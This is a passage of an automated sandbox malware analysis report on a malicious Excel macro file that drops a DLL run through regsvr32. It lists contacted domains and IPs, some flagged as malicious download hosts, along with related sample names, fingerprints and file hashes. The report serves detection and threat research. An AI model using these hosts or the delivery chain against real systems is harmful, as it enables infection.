https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/es/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://crl.sca1b.amazontrust.com/sca1b.crl0	regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://astrocycle.download/nection	regsvr32.exe, 00000004.00000002.2089822368.0000000000403000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://d1le29qyzha1u4.cloudfront.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://docs.aws.amazon.com/index.html?nc2=h_ql_doc	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	regsvr32.exe, 00000003.00000002.2082554663.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2089905889.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2090487136.0000000001D60000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
https://p.adsymptotic.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://docs.aws.amazon.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
http://www.windows.com/pctv.	regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	false		high
https://a0.awsstatic.com/pricing-calculator/js/1.0.2	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/plc/js/1.0.112/plc	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/marketplace/?nc2=h_mo	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://d2a6igt6jhaluh.cloudfront.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
http://ocsp.sca1b.amazontrust.com06	regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://amazon.com/	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/support/home/?nc2=h_ql_cu	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/search/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/?nc2=h_lg	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://console.aws.amazon.com/support/home/?nc1=f_dr	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/fr/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	regsvr32.exe, 00000004.00000002.2092067785.0000000003177000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://mktg-apac.s3-ap-southeast-1.amazonaws.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://www.twitch.tv/aws	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/marketplace/?nc2=h_ql_mp	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/search	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/libra-head.js	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://crl.rootg2.amazontrust.com/rootg2.crl0	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000004.00000002.2090932713.0000000002BA0000.00000002.00000001.sdmp	false		high
https://d36cz9buwru1tt.cloudfront.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/da/js/1.0.47/aws-da.js	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/tw/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/tr/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/?nc2=h_m_mc	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/fr/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2086065196.000000000337F000.00000004.00000001.sdmp	false		high
https://awsmedia.s3.amazonaws.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
http://o.ss2.us/0	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/search/?searchQuery=	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-search/1.0.13/js	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/privacy/?nc1=f_pr	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/pt/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/jp/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false		high
https://d3ctxlq1ktw2nl.cloudfront.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://amazonwebservices.d2.sc.omtrdc.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/podcasts/aws-podcast/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://d1yyh5dhdgifnx.cloudfront.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/jp/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://d1hemuljm71t2j.cloudfront.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.52.111	thousandsyears.download	United States	13335	CLOUDFLARENETUS	false
13.224.92.73	dr49lng3n1n2s.cloudfront.net	United States	16509	AMAZON-02US	false
104.21.37.209	astrocycle.download	United States	13335	CLOUDFLARENETUS	true
172.67.146.88	uppercilio.fun	United States	13335	CLOUDFLARENETUS	false
172.67.194.117	voopeople.fun	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	444774
Start date:	06.07.2021
Start time:	17:06:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Schedule-982347-Y6844315.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 70.6% (good quality ratio 56.6%) Quality average: 70.2% Quality standard deviation: 40%
HCA Information:	Successful, ratio: 76% Number of executed functions: 12 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.52.111	Formtofill4184860.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
13.224.92.73	HRScheduleH3965005.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
104.21.37.209	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	astrocycle.download/
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	astrocycle.download/
	Formtofill4184860.xlsm	Get hash	malicious	Browse	astrocycle.download/
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	astrocycle.download/
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	astrocycle.download/
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	astrocycle.download/
172.67.146.88	HRScheduleH3965005.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	PI-9823472110866.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	List-4527768.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg
	Formtofill4184860.xlsm	Get hash	malicious	Browse	uppercilio.fun/div/44376,8555986111.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
thousandsyears.download	HRScheduleH3965005.xlsm	Get hash	malicious	Browse	172.67.198.51
	PI-9823472110866.xlsm	Get hash	malicious	Browse	172.67.198.51
	uhr908723097306.xlsm	Get hash	malicious	Browse	172.67.198.51
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.198.51
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.198.51
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.198.51
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.198.51
	Formtofill4184860.xlsm	Get hash	malicious	Browse	104.21.52.111
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	172.67.198.51
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.198.51
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.198.51
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.198.51
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.198.51
voopeople.fun	HRScheduleH3965005.xlsm	Get hash	malicious	Browse	172.67.194.117
	PI-9823472110866.xlsm	Get hash	malicious	Browse	104.21.12.122
	uhr908723097306.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.194.117
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.194.117
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
uppercilio.fun	HRScheduleH3965005.xlsm	Get hash	malicious	Browse	172.67.146.88
	PI-9823472110866.xlsm	Get hash	malicious	Browse	172.67.146.88
	uhr908723097306.xlsm	Get hash	malicious	Browse	104.21.55.83
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	104.21.55.83
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.146.88
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.146.88
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	104.21.55.83
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.146.88
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.55.83
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	104.21.55.83
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	104.21.55.83
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	104.21.55.83
	PI-210610.xlsm	Get hash	malicious	Browse	104.21.55.83

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	HRScheduleH3965005.xlsm	Get hash	malicious	Browse	172.67.194.117
	Cava.com_Fax-Message.htm	Get hash	malicious	Browse	104.16.18.94
	VM52MC9YQDUO0P.html	Get hash	malicious	Browse	104.16.18.94
	PI-9823472110866.xlsm	Get hash	malicious	Browse	104.21.12.122
	uhr908723097306.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.194.117
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.194.117
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	runsys32.dll	Get hash	malicious	Browse	104.20.185.68
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	SMR8OzIgNB.exe	Get hash	malicious	Browse	104.21.8.151
	Follow up Purchase order num- 4500262450.exe	Get hash	malicious	Browse	104.21.75.42
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
	2790000.dll	Get hash	malicious	Browse	104.20.185.68
	2770174.dll	Get hash	malicious	Browse	104.20.185.68
AMAZON-02US	HRScheduleH3965005.xlsm	Get hash	malicious	Browse	13.224.92.73
	Enquiry#List For Order070621.exe	Get hash	malicious	Browse	13.59.53.244
	PI-9823472110866.xlsm	Get hash	malicious	Browse	143.204.91.74
	uhr908723097306.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	143.204.91.74
	List-4527768.xlsm	Get hash	malicious	Browse	13.225.75.73
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.225.75.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.225.75.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.224.92.73
	Reciept 19129475.xlsb	Get hash	malicious	Browse	54.191.98.150
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.224.92.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.224.92.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.4.74
	GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msi	Get hash	malicious	Browse	18.231.168.212
	39d0c1e7.msi	Get hash	malicious	Browse	3.143.159.48
	Movcy_v1.0.0.apk	Get hash	malicious	Browse	52.39.180.2
	order No. 00192099##001 pdf.exe	Get hash	malicious	Browse	3.143.65.214
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse	143.204.91.74

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	HRScheduleH3965005.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-9823472110866.xlsm	Get hash	malicious	Browse	13.224.92.73
	uhr908723097306.xlsm	Get hash	malicious	Browse	13.224.92.73
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	13.224.92.73
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	13.224.92.73
	List-4527768.xlsm	Get hash	malicious	Browse	13.224.92.73
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.224.92.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.224.92.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.224.92.73
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.224.92.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.224.92.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-210610.xlsm	Get hash	malicious	Browse	13.224.92.73
	108020075.exe	Get hash	malicious	Browse	13.224.92.73
	G-DECL G50 EURL.xlsx	Get hash	malicious	Browse	13.224.92.73
	1.doc	Get hash	malicious	Browse	13.224.92.73
	DECL G50 EURL!.xlsx	Get hash	malicious	Browse	13.224.92.73
	Order No. 211128.doc	Get hash	malicious	Browse	13.224.92.73
	SOA.xlsx	Get hash	malicious	Browse	13.224.92.73
	DECL G50 EURL.xlsx	Get hash	malicious	Browse	13.224.92.73

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml	HRScheduleH3965005.xlsm	Get hash	malicious	Browse
	PI-9823472110866.xlsm	Get hash	malicious	Browse
	uhr908723097306.xlsm	Get hash	malicious	Browse
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	List-4527768.xlsm	Get hash	malicious	Browse
	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse
C:\Users\user\XTOWN.dll	HRScheduleH3965005.xlsm	Get hash	malicious	Browse
	PI-9823472110866.xlsm	Get hash	malicious	Browse
	uhr908723097306.xlsm	Get hash	malicious	Browse
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	List-4527768.xlsm	Get hash	malicious	Browse
	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: HRScheduleH3965005.xlsm, Detection: malicious, Browse Filename: PI-9823472110866.xlsm, Detection: malicious, Browse Filename: uhr908723097306.xlsm, Detection: malicious, Browse Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse Filename: List-4527768.xlsm, Detection: malicious, Browse Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1033902.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	174009
Entropy (8bit):	7.967231122944825
Encrypted:	false
SSDEEP:	3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
MD5:	C0AF15BAE70AFFC4BE7625110AEEF09A
SHA1:	AEF94E038F0538C812AAF9EF605F76AF2376A26D
SHA-256:	D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
SHA-512:	131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................

C:\Users\user\Desktop\~$Schedule-982347-Y6844315.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\XTOWN.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: HRScheduleH3965005.xlsm, Detection: malicious, Browse Filename: PI-9823472110866.xlsm, Detection: malicious, Browse Filename: uhr908723097306.xlsm, Detection: malicious, Browse Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse Filename: List-4527768.xlsm, Detection: malicious, Browse Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
